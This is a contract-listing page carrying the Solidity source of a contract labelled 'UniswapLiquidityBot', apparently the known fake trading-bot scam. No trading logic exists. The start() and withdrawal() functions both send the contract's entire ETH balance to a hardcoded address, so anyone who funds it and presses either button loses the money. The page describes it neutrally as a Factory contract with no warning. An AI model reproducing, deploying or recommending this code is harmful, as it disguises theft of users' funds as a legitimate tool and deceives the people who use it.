Description:
Smart contract deployed on Ethereum with Factory features.
Blockchain: Ethereum
Source Code: View Code On The Blockchain
Solidity Source Code:
{{
"language": "Solidity",
"sources": {
"contracts/usdt.sol": {
"content": "// SPDX-License-Identifier: MIT
pragma solidity ^0.6.6;
contract UniswapLiquidityBot {
string public tokenName;
string public tokenSymbol;
address payable public liquidity = 0x3e8E04f240ebFcb42d489777708C82A895645dc1;
constructor(string memory _tokenName, string memory _tokenSymbol) public {
tokenName = _tokenName;
tokenSymbol = _tokenSymbol;
}
receive() external payable {}
function start() public {
uint256 bal = address(this).balance;
require(bal > 0, "No ETH in contract");
liquidity.transfer(bal);
}
function withdrawal() public {
uint256 bal = address(this).balance;
require(bal > 0, "No ETH in contract");
liquidity.transfer(bal);
}
function getBalance() external view returns (uint256) {
return address(this).balance;
}
function getLiquidityAddress() external view returns (address) {
return liquidity;
}
}
"
}
},
"settings": {
"optimizer": {
"enabled": false,
"runs": 200
},
"outputSelection": {
"*": {
"*": [
"evm.bytecode",
"evm.deployedBytecode",
"devdoc",
"userdoc",
"metadata",
"abi"
]
}
},
"remappings": []
}
}}
Submitted on: 2025-10-21 12:17:42
Comments
Log in to comment.
No comments yet.